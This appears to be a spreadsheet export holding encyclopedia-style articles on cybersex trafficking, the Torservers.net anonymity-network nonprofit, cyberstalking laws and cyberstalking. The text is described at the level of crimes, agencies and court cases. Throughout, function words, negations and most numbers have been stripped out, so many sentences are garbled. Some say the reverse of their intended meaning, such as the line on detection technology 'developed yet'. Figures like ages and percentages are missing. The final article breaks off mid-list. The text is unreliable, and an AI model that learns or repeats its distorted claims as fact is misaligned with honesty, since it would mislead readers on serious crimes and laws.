    <t>cybersex trafficking, live streaming sexual abuse, webcam tourism/abuse icts (information communication technologies)-facilitated sexual exploitation cybercrime involving trafficking live streaming coerced sexual acts and/or rape webcam.cybersex trafficking distinct crimes. victims transported traffickers 'cybersex dens', locations webcams internet-connected devices live streaming software. there, victims forced perform sexual acts people sexual slavery raped traffickers assisting assaulters live videos. victims frequently ordered watch paying live distant consumers purchasers shared screens follow commands. often commercialized, cyber form forced prostitution. women, children, people poverty particularly vulnerable coerced internet sex. computer-mediated communication images produced crime type rape pornography child pornography filmed broadcast real time recorded.there data magnitude cybersex trafficking world. technology detect incidents live streaming crime developed yet. millions reports cybersex trafficking sent authorities annually. billion-dollar, illicit industry brought digital connected globalization. surged world-wide expansion telecommunications global proliferation internet smartphones, particularly developing countries. also facilitated software, encrypted communication systems, network technologies constantly evolving, well growth international online payment systems wire transfer services cryptocurrencies hide transactor's identities.the transnational nature global scale cybersex trafficking necessitate united response nations, corporations, organizations world reduce incidents crime; protect, rescue, rehabilitate victims; arrest prosecute perpetrators. some governments initiated advocacy media campaigns focus awareness crime. they also implemented training seminars held teach enforcement, prosecutors, authorities, well workers, combat crime provide trauma-informed aftercare service. legislation combating cybersex trafficking needed twenty-first century. terminology cyber-, combining form, defined 'connected electronic communication networks, especially internet.' trafficking human trafficking purpose sexual exploitation, including sexual slavery. victims cybersex trafficking trafficked transported 'cybersex dens,' rooms locations webcam. cybercrime also involves transporting streaming images victims' bodies sexual assaults real time computer webcam computers connected internet. thus occurs partly physical real world, sexual assault real, partly cyberspace. victims victims, predominantly women children, abducted, threatened, deceived. others drugged. they held captive locked rooms covered windows webcam. they experience physical psychological trauma. gang rape occurred webcam. some coerced incest. victims denied food, deprived sleep, forced perform sick. they contracted diseases, including tuberculosis, captivity. number assaulted tortured.victims exploited location cybersex traffickers computer, tablet, phone internet connection. these locations, commonly referred ‘cybersex dens,’ homes, hotels, offices, internet cafes, businesses, making extremely difficult impossible enforcement identify. number cybersex trafficking victims unknown. some victims simultaneously forced prostitution brothel location.rescues involving live streaming commercial sexual exploitation children parents often require separation minors families lives shelter.some victims physically transported held captive, rather victims online sextortion. they threatened, webcam blackmailed, bullied film committing online sexual acts. victims coerced self-penetrate, called 'rape distance.' others deceived, including phony romantic partners really rape child pornography distributors, film masturbating. videos live streamed purchasers recorded later sale.those marginalized poverty, conflict, social exclusion, discrimination, social disadvantages increased risk victimized. cybersex trafficking non-consensual dissemination sexual content involving women girls, often involving threats, referred "digital gender violence" 'online gender-based violence.'victims, despite coerced, continue criminalized prosecuted certain jurisdictions. perpetrators traffickers transport victims locations webcams live streaming software. they assisting assaulters commit film crimes produce real time rape pornography child pornography materials recorded. online audience consumers, often another country, issue commands victims rapers services. male female perpetrators, operating behind virtual barrier often anonymity, come countries throughout world every social economic class. some traffickers assaulters victim's family members, friends, acquaintances. traffickers part aided international criminal organizations, local gangs, small crime rings person. they operate clandestinely sometimes lack coordinated structures eradicated authorities. majority purchasers consumers men. impunity problem. encrypted nature modern technology makes difficult track perpetrators. they motivated greed sexual gratification. traffickers advertise children internet obtain purchasers. funds acquired cybersex traffickers laundered.overseas predators seek live streaming made-to-order services sexually exploit children. they engage threat gain trust local traffickers, often victims' parents neighbors, abuse takes place. internet platforms cybersex trafficking partly internet-based crime. perpetrators social media networks, videoconferences, dating pages, online chat rooms, mobile apps, dark sites, pages domains. they also telegram cloud-based instant messaging voice services, well peer-to-peer (p2p) platforms, virtual private networks (vpn), protocols software, among applications, carry activities anonymously. consumers made payments traffickers, sometimes victim's family members, using western union, paypal, electronic payment systems. dark cybersex trafficking occurs commonly dark websites, users provided sophisticated technical cover identification. social media perpetrators facebook social media technologies. videotelephony cybersex trafficking occurs skype videoconferencing applications. pedophiles direct child abuse using live streaming services. activities region australia oceania australian federal police (afp) investigates cybersex trafficking crimes domestically asia-pacific region.in 2016, queensland police service officers task force argos 2016, queensland police service officers task force argos executed federal search warrant 58-year-old australian man's residence. australian pleaded guilty numerous charges, including soliciting child child years outside australia. using skype, conducted "live remote" sexual abuse, exploiting young children philippines making payments mother. exploitation began children years old, abuse continued nearly five years. 2019, according australian federal police (afp), numerous cases also uncovered related australians allegedly paying manipulating child sexual abuse. november 2019, australia alerted child sexual abuse live streaming austrac filed legal action westpac bank relation million suspected violations anti-money laundering counter-terrorism financing 2006 (cth).since 2017, (international justice mission) australia working legal reforms strengthen australia's response osec, commonly known online trafficking children. june 2020, houses parliament australia enacted crimes legislation amendment (sexual crimes against children community protection measures) bill 2019, received royal assent june 2020. jacob sarkodee, australia, noted legislation recognizes contribution australians growing demand online trafficking children. according 2020 global osec report, australians third largest purchasers cybersex trafficking children philippines. under proposal made ijm, legislation specifies watch live streaming child cybersex trafficking receive penalties manipulate direct sexual abuse children themselves. east asia cybersex trafficking occurred 2018–2020 room case south korea. march 2020, south korean news agencies reported details room case: crypto-messaging apps telegram discord, least women minors performed "sex shows" online global audience thousands paid cryptocurrency". victims manipulated tortured viewers referred slaves. this case related widespread availability expansion cameras (often referred "molka") south korea.north korean women girls subjected penetrative vaginal anal rape, groping, forced masturbation 'online rape dens' china.in trade female north koreans, cybersex trafficking small rapidly growing element. girls young years abused exploited "sex shows" broadcast live online paying audience, many believed korean men.according korea future initiative 2019, estimated percent north korean female refugees china trafficked trade, these, percent sold cybersex dens exploitation global online audiences. china's crackdown undocumented north koreans july 2017 developing cybersex industry fueled rapid expansion cybersex dens.cybersex trafficking thought extremely lucrative. according primary research, helpers experiences, survivors testimonies, live streamed videos cybersex featuring north korean girls ages 9–14 cost $60-$110, videos featuring north korean girls women ages 17–24 cost $90. offenders believed manipulate victims means drugs violence (physical sexual). investigation conducted february september 2018, south korean websites discovered promote north korean cybersex pornography, even form "pop-up" advertisements. high demand north korean cybersex victims largely driven south korean high involvement searching korean-language pornography. south korea, compared penalties made production distribution child sexual abuse imagery, penalties possess images child porn international standards. europe european union agency enforcement cooperation (europol) investigates spreads awareness live streaming sexual abuse. europol's european cybercrime centre (ec3) especially equipped combat cybercrime.the united kingdom's national crime agency (nca) investigates cybersex trafficking crimes domestically abroad.europe second largest source "online enticement" cybertipline reports. according global threat assessment 2018, many customers online sexual exploitation children (osec) centered europe, along traffickers victims osec.in 2019, europe accounted sexual exploitation worldwide. minors usually trafficked purpose sexual exploitation foreign female children nigeria. europe, women children exploited trade increasingly advertised online, children found promoted adults.the great internet freedom hosting costs make netherlands countries major market online sexual exploitation. 2018 annual report,internet watch foundation (iwf) said percent (82803 105047) urls materials child sexual abuse europe, vast majority netherlands-based. material produced different countries globe, hosted computer servers netherlands. reported 105,047 urls linked illegal images child sexual abuse, netherlands hosting percent content. north america federal bureau investigation (fbi) homeland security investigations (hsi), investigative united states department homeland security, carry anti-cybersex trafficking operations. united states department state office monitor combat trafficking persons (j/tip) partners agencies organization overseas rescue cybersex trafficked victims. southeast asia united nations children's fund (unicef) identified philippines global center cybersex trafficking. office cybercrime within philippines department justice receives hundreds thousands tips videos images sexually exploited filipino children internet. philippine national police, along women children protection center (wcpc), philippine internet crimes against child center (picacc), philippine interagency council against trafficking (iacat, department justice (philippines), department social welfare development fight cybersex trafficking country. rancho cristo cebu shelter devoted exclusively rehabilitating children live streaming sexual abuse. children shelter provided food, medical care, counselling, mentoring life skills training. royal thai police's internet crimes against children (ticac) task force combats cybersex trafficking nation. combating crime authorities, skilled online forensics, cryptography, areas, data analysis information sharing fight cybersex trafficking. deep learning, algorithms, facial recognition also hoped combat cybercrime. flagging panic buttons certain videoconferencing software enable users report suspicious people acts live streaming sexual abuse. investigations sometimes hindered privacy laws make difficult monitor arrest perpetrators. conviction rates perpetrators low.the international criminal police organization (icpo-interpol) collects evidence live streaming sexual abuse crimes. virtual global taskforce (vgt) comprises enforcement agencies across world combat cybercrime. united nations children's fund (unicef) funds training police identify address cybercrime.multinational technology companies, google, microsoft, facebook, collaborate, develop digital tools, assist enforcement combating education ministry education malaysia introduced cybersex trafficking awareness secondary school syllabuses. relation crimes cybersex trafficking shares similar characteristics overlaps crimes. that said, according attorney joshua carback, unique development history sexual violence" "distinct several respects traditional conceptions online child pornography human trafficking". main particularization involves victims trafficked transported raped abused live webcam shows. united nations office drugs crime identified cybercrime involving trafficked victims webcam shows emerging problem. illegal live streaming shows occur 'cybersex dens,' rooms equipped webcams. cybercrime sometimes informally called 'webcam rape'. non-governmental organizations international justice mission world's leading nonprofit organizations carries anti-cybersex trafficking initiatives. child prostitution, child pornography trafficking children sexual purposes (ecpat) peace integrity creation-integrated development center inc., non-profit organization philippine, support enforcement operations cybersex trafficking.the national center missing exploited children united states assists authorities cybersex trafficking cases. provides cybertipline reports enforcement agencies.terre hommes international non-profit combats live streaming sexual abuse children.the korea future initiative london-based organization obtains evidence publicizes violations human rights, including cybersex trafficking north korean women girls china. references further reading brown, rick; napier, sarah; smith, russell (february 2020). australians view live streaming child sexual abuse: analysis financial transactions. australian institute criminology. isbn 9781925304336. bryce, (november 2009). "chapter online sexual exploitation children young people". jewkes, yvonne; yar, majid (eds.). handbook internet crime. routledge. 320–342. isbn 978-1843925248. carback, joshua (2018). "cybersex trafficking: toward more effective prosecutorial response". criminal bulletin. (1): 64–183. abstract. chibba, michael (april 2014). "contemporary issues human trafficking, migration exploitation". migration development. (2): 163–173. doi:10.1080/21632324.2014.885286. s2cid 153982821. abstract. dushi, desara (october 2019). "chapter combating live-streaming child sexual abuse sexual exploitation: need legislation". hunsinger, jeremy; allen, matthew klastrup, lisbeth (eds.). second international handbook internet research. springer. 201–223. isbn 978-9402415537. greiman, virginia bain, christina (2013). "the emergence cyber activity gateway human trafficking". journal information warfare. (2): 41–49. abstract. humphreys, krystal; clair, brian hicks, janet (2019). "intersections pornography human trafficking: training ideas implications". journal counselor practice. (1): 19–39. reed, t.v. (june 2014). digitized lives: culture, power, social change internet era. routledge. isbn 978-0415819312. "study effects information technologies abuse exploitation children" (pdf). united nations office drugs crime. 2015. quayle, ethel; ribisl, kurt (march 2013). understanding preventing online sexual exploitation children. routledge. isbn 978-0415689410. external links international justice mission (ijm) cybersex trafficking casework english) korea future initiative report (london, 2019) slaves: prostitution, cybersex forced marriage north korean women girls china english) united nations correspondents association (unca) briefing combatting cybersex trafficking english)</t>
  </si>
  <si>
    <t>Torservers.net</t>
  </si>
  <si>
    <t>torservers.net independent network non-profit organisations provide nodes anonymity network. network started june 2010 currently transfers 5.7gb/s exit node traffic 2022.torservers.net known operating servers high network bandwidth running exit nodes network, helps increase speed capacity. group additionally helps provide lawyers relay operators along arranging operator meetups. funding while free software anyone run, successful operation nodes require technical expertise, access high-bandwidth, involve legal complications jurisdictions. torservers.net network accepts financial donations sponsor additional nodes. bavarian raid june 2018, bavarian police raided home board members german non-profit zwiebelfreunde, "friends onion," (part torservers.net). zwiebelfreunde helps collect donations europe various non-commercial providers riseup.net.the police claim raid prompted blog post unrelated activist promised violence upcoming alternative germany convention augsburg. blog post published website used riseup.net e-mail address. riseup collective based seattle united states, reported publicly zwiebelfreunde service.on august german court landgericht münchen ruled raid seizures illegal. hardware documentation seized kept seal, purportedly neither analyzed evaluated bavarian police. members associated whistleblowing press (belgium) access (usa) calyx institute (usa) zwiebelfreunde e.v. (germany) hart voor internetvrijheid (netherlands) library freedom project (usa) noisebridge (usa) external links official website references</t>
  </si>
  <si>
    <t>Cyberstalking legislation</t>
  </si>
  <si>
    <t>cyberstalking cyberbullying relatively phenomena, mean crimes committed network punishable legislation drafted purpose. although often existing laws prohibit stalking harassment general sense, legislators sometimes believe laws inadequate enough, thus bring forward legislation address perceived shortcoming. united states, example, nearly every state laws address cyberstalking, cyberbullying, both. issues stake cyberbullying cyberstalking, nature, define adversarial relationships. person group), provocateur, exerting view opinion person group), target, finds offensive, hurtful, damaging way. general sense, would seem simple legislate type behavior; slander libel laws exist tackle situations. however, slander libel, important balance protection freedom speech parties need protection target. thus, something deemed cyberbullying first glance may, fact, akin something like parody similar. 2006 national crime prevention council survey found teens experienced cyberbullying point lives, making problem particularly widespread. issue cyberbullying extensive, adverse effects adolescents: increased depression, suicidal behavior, anxiety, increased susceptibility drug aggressive behavior. legislation country australia australia specific cyberbullying legislation, although scope existing laws extended deal cyberbullying. state laws deal forms cyberbullying, documents containing threats, threats destroy damage property.commonwealth offences criminalise misuse telecommunication services also relevant technology used communicate harassment threats.the family 1975 (cth) protects individuals harassment, including harassment occurs electronic communications. however, limited victims family violence.the australian government proposed specific cyberbullying laws protect children. united states "cyberbullying" versus "cyberstalking" practice, little legislative difference concepts "cyberbullying" "cyberstalking." primary distinction age; adults involved, usually termed cyberstalking, among children usually referred cyberbullying. however, distinction semantics, many laws treat bullying stalking much issue. freedom speech issues first amendment concerns often arise questionable speech uttered posted online. this equally true dealing cyberbullying. particularly instances laws explicitly cyberbullying, uncommon defendants argue conduct amounts exercise freedom speech. courts variously come either side debate, even within state. example, student california suspended school based cyberbullying claims took school district court, citing breach first amendment rights; court agreed student found school district overstepped authority. another california case, student harassed posting personal information online, court found threatening posts protected speech. state north carolina invalidated state bishop.that said, true threats considered protected speech.organizations american civil liberties union taken view cyberbullying overly expansive term, first amendment protects speech, even reprehensible; protection would extend internet.in general, organizations argue need legislation cyberbullying exist, legislators must take cautious, reasoned approach enacting laws, rush creating laws would curtail speech much.internet free speech issues certainly made court systems, even back cases mid-90s. case united states baker, example, undergraduate university michigan charged crimes related snuff stories posted internet newsgroups, stories named fellow students. after progressing courts, charges baker dismissed primarily grounds evidence baker would actually fantasies contained stories. this case considered landmark realm first amendment issues internet. need laws focus legislating cyberbullying cyberstalking largely come result perceived inadequacy, generally legislators parents bullying victims, existing laws, whether existing laws cover stalking, unauthorized computer resources, like. motivation behind bill 1990 u.s. states federal government passed bill "criminalize" stalking cases stalking celebrities (spitzberg hoobler, 2002). example, case united states lori drew, megan meier committed suicide bullied myspace, three four charges defendant (drew) actually response alleged violations computer fraud abuse act, since specific statues cyberbullying books. jury eventually found drew innocent charges (but guilty misdemeanor), verdict later aside judge. situation, legislators missouri, urging public meier's parents, passed "megan's law", primarily aimed crime person years bullying person years age. addition, prosecutors sometimes legal avenues prosecute offenders. case tyler clementi, killed video homosexual encounter broadcast internet, prosecutors charged defendants invasion privacy computer crimes. like meier case, clementi case spurred legislators (this time, jersey) pass specifically aimed bullying, "anti-bullying bill rights".while laws written focus cyberbullying acts occur within school, others general, targeting cyberbullying matter occurs. addition, newly written laws (like connecticut) onus school system, mandating school's administration must intervene first sign bullying.finally, uncommon cyberbullying coupled "traditional", in-person bullying, example, suicide phoebe prince. students school bullied months school, harassment eventually moved online well. connecticut, jersey, missouri, prince case stricter anti-bullying legislation massachusetts. legislation state level some u.s. states begun address problem cyberbullying. states passed legislation done generally response incidents within state, address believe shortcomings federal laws, expand protection victims beyond existing statutes. there laws address online harassment children focus child predators well laws protect adult cyberstalking victims, victims age. while sites specialize laws protect victims under, working halt online abuse help resource listing current pending cyberstalking-related united states federal state laws. also lists states laws related laws countries. california california passed first cyberstalking 1999. (§646.9 california penal code.) first resulted six-year sentence harassed woman could identify him. after sending hundreds threatening e-mails actress, another male convicted spending months jail waiting trial sentenced 2001 five years probation, forbidden access computers forced attend mental health counseling. 2011, ordered undergo psychiatric evaluation sentencing cyberstalking. january 2009, california became effective allows schools suspend expel students harass students online. also mandates schools develop policies address problem. addition, section 1708.7 california civil code outlines grounds individual suing cyberstalker accomplices general damages, special damages, punitive damages cyberstalking. florida under florida statute 784.048, "cyberstalking," defined engage course conduct communicate, cause communicated, words, images, language electronic mail electronic communication, directed specific person, causing substantial emotional distress person serving legitimate purpose, classified first degree misdemeanor. cyberstalking child person offender ordered courts contact considered "aggravated stalking," third degree felony florida law. cyberstalking conjunction credible threat also considered aggravated stalking.in 2008, florida passed "jeffrey johnston stand students act" response suicide 15-year-old jeffrey johnston, suffered cyberbullying long period time. unusual among state laws regarding cyberbullying provision withholds funding schools compliance provision must inform parents involved cyberbullying—both bully target. illinois according "who@: working halt online abuse": sec. 1-2. harassment electronic communications.(a) harassment electronic communications electronic communication following purposes: making comment, request, suggestion proposal obscene intent offend; interrupting, intent harass, telephone service electronic communication service person; transmitting person, intent harass regardless whether communication read entirety all, file, document, communication prevents person using telephone service electronic communications device; transmitting electronic communication knowingly inducing person transmit electronic communication purpose harassing another person years age, regardless whether person years consents harassment, defendant least years time commission offense; threatening injury person property person electronic communication directed family household members; knowingly permitting electronic communications device used purposes mentioned subsection (a).(b) used act: "electronic communication" means transfer signs, signals, writings, images, sounds, data intelligence nature transmitted whole part wire, radio, electromagnetic, photoelectric photo-optical system. "electronic communication" includes transmissions computer internet another computer. "family household member" includes spouses, former spouses, parents, children, stepchildren persons related blood present prior marriage, persons share formerly shared common dwelling, persons allegedly share blood relationship child, persons dating engagement relationship, persons disabilities personal assistants. purposes act, neither casual acquaintanceship ordinary fraternization individuals business social contexts shall deemed constitute dating relationship.(c) telecommunications carriers, commercial mobile service providers, providers information services, including, limited internet service providers hosting service providers, liable section, except willful wanton misconduct, virtue transmission, storage, caching electronic communications messages others virtue provision related telecommunications, commercial mobile services, information services used others violation section. (source: p.a. 95-849, eff. 1-1-09; 95-984, eff. 6-1-09; 96-328, eff. 8-11-09.) massachusetts response phoebe prince's suicide, well carl walker—both bullied taking lives—the massachusetts legislature 2010 passed advocates call toughest anti-bullying laws nation. prohibits online taunting physical emotional abuse, mandates training faculty students schools. mandates school administrators inform parents bullying occurs within schools themselves. missouri noted previously, 2008 missouri revised statutes harassment include harassment stalking electronic telephonic communications cyber-bullying suicide megan meier. york york state passed dignity students act, focusing primarily elementary middle school students. texas texas enacted stalking electronic communications 2001. washington state washington passed first cyberstalking laws 2004, states person uses electronic communications "intent harass, intimidate, torment, embarrass person" lewd obscene language, language implying physical threats, repeatedly harass person; treated gross misdemeanor. however, constitutionality challenged courts, judge ronald leighton united states district court western district washington ruled february 2019 written could include large range non-obscene, non-threatening speech" result even public criticisms public figures public officials could subject criminal prosecution punishment". judge leighton placed injunction block enforcement pending appeal. 2021, senate introduced bills addressing cyberharassment, first which, senate bill (sb) 5881, mainly aimed preventing doxing, free speech concerns existing cyberstalking laws. bill, 5628, focused online harassment written anti-defamation league update existing uphold first amendment.washington takes approach putting focus cyberbullying prevention response directly schools. also requires schools create policies address bullying general sense. legislation federal level attempts legislating cyberbullying tried federal level, primarily commerce clause u.s. constitution specifically provides federal government regulate commerce states; includes electronic communication internet. early example, violence against women act, passed 2000, included cyberbullying part interstate status harassment. megan meier cyberbullying prevention 2009, representative linda sánchez (d-ca) brought legislation titled "megan meier cyberbullying prevention act" u.s. house representatives. efforts little enthusiasm, however, representatives republican democratic parties concerned bill's impact freedom speech. oft-cited arguments bill comes talk radio, concern expressed would used silence political opponents airwaves espouse divergent viewpoints. another issue would make violation felony, rather misdemeanor done states. opponents bill argue since target legislation nominally teenagers, would undue burden prison system—since long-term facilities teenage offenders federal level. addition, opponents call proposed sentences years incarceration) excessive.while sánchez' bill discussed committee, passed stage 2012. tyler clementi higher education anti-harassment early march 2011, u.s. senator frank lautenberg (d-nj) representative rush holt, (d-nj-12) introduced "tyler clementi higher education anti-harassment act", would mandate colleges universities receive federal funding policies place address harassment—including cyberbullying. universities would required address harassment focuses real perceived race, color, national origin, sex, disability, sexual orientation, gender identity, religion. bill would also enable u.s. department education provide training institutes higher education prevent address harassment. furthermore, bill addresses student-to-student harassment, also harassment students faculty staff well. however, like megan meier cyberbullying prevention act, bill also detractors. opponents point harassment college campuses already prohibited existing laws; furthermore, point harassment based sexual orientation also covered existing statutes. addition, sánchez bill, questions free speech implications. india prior february 2013, laws directly regulate cyberstalking india. india's information technology 2000 act) laws regulate cyberspace. however, merely focused financial crimes neglected interpersonal criminal behaviours cyberstalking (behera, 2010; halder jaishankar, 2008; nappinai, 2010). 2013, indian parliament made amendments indian penal code, introducing cyberstalking criminal offence. stalking defined woman follows contacts woman, despite clear indication disinterest contact woman, monitoring internet electronic communication woman. woman committing offence stalking would liable imprisonment three years first offence, shall also liable fine subsequent conviction would liable imprisonment five years fine. poland cyberstalking illegal since 2011. zealand zealand minister justice judith collins plans introduce would make offence incite people commit suicide, post material grossly offensive 2013. international convention cybercrime international emphasizes supranational concept related cybercrime. this convention cybercrime, signed council europe budapest november 2001.the global cyber database (gcld) aims become comprehensive authoritative source cyber laws countries. universal declaration human rights article universal declaration human rights.no shall subjected torture cruel, inhuman degrading treatment. also references spitzberg, hoobler, (2002). cyberstalking technologies interpersonal terrorism. media society, 4(1), 71-92. behera, (2010). cyber crimes india. indian journal criminology criminalistics, 31(1), halder, jaishankar, (2008). cyber crimes women india: problems, perspectives solutions. academic journal, 3(10), 48-62. nappinai, (2010). cyber crime india: kept pace emerging trends? empirical study. journal international commercial technology, 5(1), 22-27. external links state cyberstalking, cyberharassment cyberbullying laws, national conference state legislatures, united states state cyberbullying laws (united states), brief review state cyberbullying laws policies, megan meier foundation</t>
  </si>
  <si>
    <t>Cyberstalking</t>
  </si>
  <si>
    <t>cyberstalking internet electronic means stalk harass individual, group, organization. include false accusations, defamation, slander libel. also include monitoring, identity theft, threats, vandalism, solicitation sex, doxing, blackmail.cyberstalking often accompanied realtime offline stalking. many jurisdictions, california, criminal offenses. both motivated desire control, intimidate influence victim. stalker online stranger person target knows. they anonymous solicit involvement people online even know target.cyberstalking criminal offense various state anti-stalking, slander harassment laws. conviction result restraining order, probation, criminal penalties assailant, including jail. definitions description there number attempts experts legislators define cyberstalking. generally understood internet electronic means stalk harass individual, group, organization. cyberstalking form cyberbullying; terms often used interchangeably media. both include false accusations, defamation, slander libel. cyberstalking also include monitoring, identity theft, threats, vandalism, solicitation sex, gathering information used threaten harass. cyberstalking often accompanied real-time offline stalking. both forms stalking criminal offenses.stalking continuous process, consisting series actions, entirely legal itself. technology ethics professor lambèr royakkers defines cyberstalking perpetrated someone without current relationship victim. about abusive effects cyberstalking, writes that: [stalking] form mental assault, perpetrator repeatedly, unwantedly, disruptively breaks life-world victim, relationship longer has), motives directly indirectly traceable affective sphere. moreover, separated acts make intrusion cannot cause mental abuse, taken together (cumulative effect). distinguishing cyberstalking acts important draw distinction cyber-trolling cyber-stalking. research shown actions perceived harmless one-off considered trolling, whereas part persistent campaign considered stalking. cyberstalking author alexis moore separates cyberstalking identity theft, financially motivated. definition, also used republic philippines legal description, follows: cyberstalking technologically-based "attack" person targeted specifically attack reasons anger, revenge control. cyberstalking take many forms, including: harassment, embarrassment humiliation victim emptying bank accounts economic control ruining victim's credit score harassing family, friends employers isolate victim scare tactics instill fear identification detection cyberangels written identify cyberstalking: when identifying cyberstalking field," particularly considering whether report kind legal authority, following features combination features considered characterize true stalking situation: malice, premeditation, repetition, distress, obsession, vendetta, legitimate purpose, personally directed, disregarded warnings stop, harassment threats. number factors identified cyberstalking: false accusations: many cyberstalkers damage reputation victim turn people them. they post false information websites. they websites, blogs user pages purpose. they post allegations victim newsgroups, chat rooms, sites allow public contributions wikipedia amazon.com. attempts gather information victim: cyberstalkers approach victim's friends, family work colleagues obtain personal information. they advertise information internet, hire private detective. monitoring target's online activities attempting trace address effort gather information victims. encouraging others harass victim: many cyberstalkers involve third parties harassment. they claim victim harmed stalker his/her family way, post victim's name telephone number order encourage others join pursuit. false victimization: cyberstalker claim victim harassing her. bocij writes phenomenon noted number well-known cases. attacks data equipment: they damage victim's computer sending viruses. ordering goods services: they order items subscribe magazines victim's name. these often involve subscriptions pornography ordering toys delivered victim's workplace. arranging meet: young people face particularly high risk cyberstalkers meetings them. posting defamatory derogatory statements: using pages message boards incite response reaction victim. prevalence impact according enforcement technology, cyberstalking increased growth technology ways stalk victims. "disgruntled employees pose bosses post explicit messages social network sites; spouses track mates' every move. even police prosecutors find risk, gang members organized criminals find live often intimidate dropping case."in january 2009, bureau justice statistics united states released study "stalking victimization united states," sponsored office violence against women. report, based supplemental data national crime victimization survey, showed four stalking victims cyberstalked well, perpetrators using internet-based services email, instant messaging, gps, spyware. final report stated approximately million victims stalkers used technology find them. rape, abuse incest national network (rainn), washington d.c. released statistics million stalking victims year united states. those, four reported experiencing cyberstalking.according robin kowalski, social psychologist clemson university, cyberbullying shown cause higher levels anxiety depression victims normal bullying. kowalksi states much stems anonymity perpetrators, common feature cyberstalking well. according study kowalksi, 3,700 bullied middle-school students, quarter subjected form online harassment. types stalking strangers according joey rushing, district attorney franklin county, alabama, single definition cyberstalker either strangers victim former/present relationship. "[cyberstalkers] come shapes, sizes, ages backgrounds. they patrol sites looking opportunity take advantage people." gender-based stalking harassment stalking gender online, also known online gender-based violence, common, include rape threats threats violence, well posting victim's personal information. blamed limiting victims' activities online driving offline entirely, thereby impeding participation online life undermining autonomy, dignity, identity, opportunities. intimate partners cyberstalking intimate partners online harassment current former romantic partner. form domestic violence, experts purpose control victim order encourage social isolation create dependency. harassers send repeated insulting threatening e-mails victims, monitor disrupt victims' e-mail use, victim's account send e-mails others posing victim purchase goods services victim want. they also internet research compile personal information victim, order harass her. celebrities public persons profiling stalkers shows almost always stalk someone know delusion, think know, case stalkers celebrities public persons stalkers feel know celebrity even though celebrity know them. part risk take public eye, celebrities public figures often targets lies made-up stories tabloids well stalkers, even seeming fans. noted case 2011, actress patricia arquette quit facebook alleged cyberstalking. last post, arquette explained security warned facebook friends never accept friend requests people actually know. arquette stressed people seemed fans mean safe. media issued statement arquette planned communicate fans exclusively twitter account future. anonymous online mobs technologies enabled online groups anonymous people self-organize target individuals online defamation, threats violence technology-based attacks. these include publishing lies doctored photographs, threats rape violence, posting sensitive personal information victims, e-mailing damaging statements victims employers, manipulating search engines make damaging material victim prominent. victims frequently respond adopting pseudonyms going offline entirely.experts attribute destructive nature anonymous online mobs group dynamics, saying groups homogeneous views tend become extreme. members reinforce others' beliefs, fail individuals lose sense personal responsibility destructive acts. dehumanize victims, becoming aggressive believe supported authority figures. internet service providers website owners sometimes blamed speaking type harassment.a notable example online harassment experience american software developer blogger kathy sierra. 2007 group anonymous individuals attacked sierra, threatening rape strangulation, publishing home address social security number, posting doctored photographs her. frightened, sierra cancelled speaking engagements shut blog, writing never feel same. never same." corporate cyberstalking corporate cyberstalking company harasses individual online, individual group individuals harasses organization. motives corporate cyberstalking ideological, include desire financial gain revenge. perpetrators motives profile mental profiling digital criminals identified psychological social factors motivate stalkers envy; pathological obsession (professional sexual); unemployment failure life; intention intimidate cause others feel inferior; stalker delusional believes he/she "knows" target; stalker wants instill fear person justify his/her status; belief away (anonymity); intimidation financial advantage business competition; revenge perceived imagined rejection. four types cyberstalkerspreliminary work leroy mcfarlane paul bocij identified four types cyberstalkers: vindictive cyberstalkers noted ferocity attacks; composed cyberstalker whose motive annoy; intimate cyberstalker attempts form relationship victim turns rebuffed; collective cyberstalkers, groups motive. according antonio chacón medina, author nueva cara internet, acoso face internet: stalking"), general profile harasser cold, little respect others. stalker predator wait patiently vulnerable victims appear, women children, enjoy pursuing particular person, whether personally familiar unknown. harasser enjoys demonstrates power pursue psychologically damage victim. behaviors cyberstalkers find victims using search engines, online forums, bulletin discussion boards, chat rooms, recently, social networking sites, myspace, facebook, bebo, friendster, twitter, indymedia, media outlet known self-publishing. they engage live chat harassment flaming send electronic viruses unsolicited e-mails. cyberstalkers research individuals feed obsessions curiosity. conversely, acts cyberstalkers become intense, repeatedly instant messaging targets. more commonly post defamatory derogatory statements stalking target pages, message boards, guest books designed reaction response victim, thereby initiating contact. cases, known create fake blogs name victim containing defamatory pornographic content. when prosecuted, many stalkers unsuccessfully attempted justify behavior based public forums, opposed direct contact. once reaction victim, typically attempt track follow victim's internet activity. classic cyberstalking behavior includes tracing victim's address attempt verify home place employment. some cyberstalking situations evolve physical stalking, victim experience abusive excessive phone calls, vandalism, threatening obscene mail, trespassing, physical assault. moreover, many physical stalkers cyberstalking another method harassing victims.a 2007 study paige padgett university texas health science center found false degree safety assumed women looking love online. cyberstalking legislation legislation cyberstalking varies country country. cyberstalking cyberbullying relatively phenomena, mean crimes committed network punishable legislation drafted purpose. although often existing laws prohibit stalking harassment general sense, legislators sometimes believe laws inadequate enough, thus bring forward legislation address perceived shortcoming. point overlooked enforcing laws challenge virtual communities. reason being, issues unique enforcement agencies never faced cases related cyberstalking. united states, example, nearly every state laws address cyberstalking, cyberbullying, both.in countries practice, little legislative difference concepts "cyberbullying" "cyberstalking." primary distinction age; adults involved, usually termed cyberstalking, among children usually referred cyberbullying. however, formal definitions terms, distinction semantics many laws treat bullying stalking much issue. australia australia, stalking amendment (1999) includes form technology harass target forms "criminal stalking." canada 2012, high-profile investigation death amanda todd, young canadian student blackmailed stalked online committing suicide. royal canadian mounted police criticized media naming alleged stalkers person interest. philippines fifteenth congress republic philippines, cyberstalking bill introduced senator manny villar. result "urge senate committees science technology, public information mass media conduct inquiry, legislation, increasing occurrence cyber stalking cases modus operandi adopted internet perpetuate crimes view formulating legislation policy measures geared towards curbing cyber stalking cyber crimes protect online users country." united states history, current legislation cyberstalking criminal offense american anti-stalking, slander, harassment laws. conviction result restraining order, probation, criminal penalties assailant, including jail. cyberstalking specifically addressed recent u.s. federal law. example, violence against women act, passed 2000, made cyberstalking part federal interstate stalking statute. current federal anti-cyber-stalking found u.s.c. 223.still, remains lack federal legislation specifically address cyberstalking, leaving majority legislative state level. states stalking harassment statutes criminalize threatening unwanted electronic communications. first anti-stalking enacted california 1990, fifty states soon passed anti-stalking laws, 2009 laws specifically addressing "high-tech stalking." first u.s. cyberstalking went effect 1999 california. other states laws harassment anti-stalking statutes prohibit misuse computer communications e-mail, others passed laws containing broad language interpreted include cyberstalking behaviors, harassment stalking legislation.sentences range months prison $10,000 fine fourth-degree charge years prison $150,000 fine second-degree charge. states cyberstalking legislationalabama, arizona, connecticut, hawaii, illinois, hampshire, york included prohibitions harassing electronic, computer e-mail communications harassment legislation. alaska, florida, oklahoma, 